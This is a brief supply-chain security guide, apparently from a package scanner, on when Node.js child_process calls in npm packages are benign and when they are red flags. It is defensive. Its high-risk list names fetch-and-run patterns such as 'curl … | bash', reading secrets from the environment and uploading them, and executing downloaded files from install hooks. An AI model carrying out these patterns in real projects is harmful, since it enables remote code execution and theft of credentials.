Required Reading
~5 minAbout child_process
When it’s normal vs. when it’s a red flag.
Risk guidance
When it is normal (Low to Medium)
- Native modules compiling during install (node‑gyp) calling toolchains like make or python.
- Explicit build steps downloading from trusted GitHub Releases of the same project.
- CLI wrappers that call git or system tools at runtime, not during install.
High‑risk patterns (High)
- Downloads from unknown hosts; pipes to shell (curl … | bash).
- Reads tokens or secrets from env; uploads to remote endpoints.
- Heavy obfuscation with encoded strings and dynamic eval.
- chmod +x then executes a downloaded file.
- Appears inside lifecycle scripts (preinstall/install/postinstall/prepare).
What to do (Action)
- Isolate builds; run with --network=none unless specific host is whitelisted.
- Replace or pin dependency; require two‑person review for exceptions.
- Require checksum/signature verification for allowed remote binaries.